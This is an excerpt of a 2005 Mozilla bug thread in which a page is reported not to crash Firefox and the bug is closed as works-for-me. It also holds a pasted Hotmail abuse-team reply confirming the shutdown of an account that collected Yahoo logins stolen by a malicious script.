No crash or hang with the html and css given, and I'm on a 550mhz p3! On IRC I saw several WFM, and your user-agent given with the bug doesn't really help out, although I'm going to assume this is 1.0.6. No crash, no hang, many self-replies...also, there's a "stop script" dialog now that'll help prevent problems such as these... WFM Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050819 Firefox/1.0+ ID:2005081920
Status: UNCONFIRMED → RESOLVED
Closed: 19 years ago
Resolution: --- → WORKSFORME
| Reporter | ||
Updated•19 years ago
|
Status: RESOLVED → VERIFIED
| Reporter | ||
Comment 18•19 years ago
|
||
hotmail finally shut down the account that was receiving the emails from the script: === X-SRX: 1001428993 X-Mailer: Microsoft Avondale Mailer Thread-Topic: SRX1001428993ID - YIM virus thread-index: AcWmp0ecI1Yx21kjQGGCzoSABqrUnA== Reply-To: From: "MSN Hotmail Technical Support" <abuse_EN_SY@css.one.microsoft.com> To: "Marc Bejarano" <beej@alum.mit.xxx> Cc: Subject: RE: SRX1001428993ID - YIM virus Date: Sun, 21 Aug 2005 16:23:04 -0700 Message-ID: <03a401c5a6a7$479c9300$4c32fb0a@partners.extranet.microsoft.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_03A5_01C5A66C.9B3DBB00" Content-Class: urn:content-classes:message Importance: normal Priority: normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.3790.326 X-OriginalArrivalTime: 21 Aug 2005 23:23:04.0174 (UTC) FILETIME=[47A608E0:01C5A6A7] X-Spam-Score: 5.084 X-Spam-Level: ***** (5.084) X-Spam-Flag: NO X-Scanned-By: MIMEDefang 2.42 Hello Marc,Thank you for writing back to MSN Hotmail Technical Support. This is Victory and I have read the conversation between you and the other agents regarding the vixi_xlx_zlz_xlx@hotmail.com that spreading malware and collected Yahoo logins. I understand how troublesome this can be.Marc, I have investigated the site and the information you have provided us. As well as the account of the offender and verified that the account is indeed violates our Terms of Use (TOU). In line with this, I have closed the account you reported in accordance with the Hotmail Terms of Use (TOU). It is a strict violation of the TOU for our members to send objectionable material of any kind or nature using our service.You can view our rules and regulations at: http://privacy.msn.com/tou/default.asp Furthermore, if you would like to take actions against the person who sent you the password fishing e-mail, I suggest that you report this matter to the local authorities to further investigate the account. 
Ask them to contact us directly and provide a subpoena or search warrant, so that we could released to them the information of the account used by the offender. This is in compliance with the Electronic Communications Privacy Act (ECPA).You are valuable at MSN and we look forward to providing you with consistent and effective service. If you have any inquiries, please do not hesitate to write back.Sincerely,Victory B.MSN Hotmail Technical Support <snip quoted thread> ===